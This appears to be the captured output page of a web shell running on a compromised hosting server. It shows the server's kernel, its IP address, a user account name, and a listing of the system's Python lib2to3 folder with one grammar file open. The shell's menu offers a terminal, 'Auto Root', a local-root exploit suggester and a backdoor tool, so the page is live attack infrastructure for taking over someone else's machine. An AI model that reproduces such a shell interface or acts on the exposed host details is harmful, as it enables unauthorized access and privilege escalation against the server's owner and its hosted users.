Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.1
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib64 /
python2.7 /
lib2to3 /
Delete
Unzip
Name
Size
Permission
Date
Action
fixes
[ DIR ]
drwxr-xr-x
2026-03-06 04:23
pgen2
[ DIR ]
drwxr-xr-x
2026-03-06 04:23
Grammar.txt
6.43
KB
-rw-r--r--
2026-02-23 12:35
Grammar2.7.5.final.0.pickle
19.75
KB
-rw-r--r--
2026-02-23 12:35
PatternGrammar.txt
793
B
-rw-r--r--
2026-02-23 12:35
PatternGrammar2.7.5.final.0.pickle
1.35
KB
-rw-r--r--
2026-02-23 12:35
__init__.py
7
B
-rw-r--r--
2026-02-23 12:35
__init__.pyc
127
B
-rw-r--r--
2026-02-23 12:36
__init__.pyo
127
B
-rw-r--r--
2026-02-23 12:36
__main__.py
67
B
-rw-r--r--
2026-02-23 12:35
__main__.pyc
242
B
-rw-r--r--
2026-02-23 12:36
__main__.pyo
242
B
-rw-r--r--
2026-02-23 12:36
btm_matcher.py
6.67
KB
-rw-r--r--
2026-02-23 12:35
btm_matcher.pyc
5.69
KB
-rw-r--r--
2026-02-23 12:36
btm_matcher.pyo
5.69
KB
-rw-r--r--
2026-02-23 12:36
btm_utils.py
9.78
KB
-rw-r--r--
2026-02-23 12:35
btm_utils.pyc
7.39
KB
-rw-r--r--
2026-02-23 12:36
btm_utils.pyo
7.39
KB
-rw-r--r--
2026-02-23 12:36
fixer_base.py
6.69
KB
-rw-r--r--
2026-02-23 12:35
fixer_base.pyc
7.09
KB
-rw-r--r--
2026-02-23 12:36
fixer_base.pyo
7.09
KB
-rw-r--r--
2026-02-23 12:36
fixer_util.py
14.25
KB
-rw-r--r--
2026-02-23 12:35
fixer_util.pyc
14.34
KB
-rw-r--r--
2026-02-23 12:36
fixer_util.pyo
14.34
KB
-rw-r--r--
2026-02-23 12:36
main.py
11.33
KB
-rw-r--r--
2026-02-23 12:35
main.pyc
9.6
KB
-rw-r--r--
2026-02-23 12:36
main.pyo
9.56
KB
-rw-r--r--
2026-02-23 12:36
patcomp.py
6.92
KB
-rw-r--r--
2026-02-23 12:35
patcomp.pyc
6.51
KB
-rw-r--r--
2026-02-23 12:36
patcomp.pyo
6.21
KB
-rw-r--r--
2026-02-23 12:36
pygram.py
1.09
KB
-rw-r--r--
2026-02-23 12:35
pygram.pyc
1.38
KB
-rw-r--r--
2026-02-23 12:36
pygram.pyo
1.38
KB
-rw-r--r--
2026-02-23 12:36
pytree.py
28.36
KB
-rw-r--r--
2026-02-23 12:35
pytree.pyc
29.59
KB
-rw-r--r--
2026-02-23 12:36
pytree.pyo
28.73
KB
-rw-r--r--
2026-02-23 12:36
refactor.py
27.41
KB
-rw-r--r--
2026-02-23 12:35
refactor.pyc
23.4
KB
-rw-r--r--
2026-02-23 12:36
refactor.pyo
23.35
KB
-rw-r--r--
2026-02-23 12:36
Save
Rename
# Copyright 2006 Google, Inc. All Rights Reserved. # Licensed to PSF under a Contributor Agreement. # A grammar to describe tree matching patterns. # Not shown here: # - 'TOKEN' stands for any token (leaf node) # - 'any' stands for any node (leaf or interior) # With 'any' we can still specify the sub-structure. # The start symbol is 'Matcher'. Matcher: Alternatives ENDMARKER Alternatives: Alternative ('|' Alternative)* Alternative: (Unit | NegatedUnit)+ Unit: [NAME '='] ( STRING [Repeater] | NAME [Details] [Repeater] | '(' Alternatives ')' [Repeater] | '[' Alternatives ']' ) NegatedUnit: 'not' (STRING | NAME [Details] | '(' Alternatives ')') Repeater: '*' | '+' | '{' NUMBER [',' NUMBER] '}' Details: '<' Alternatives '>'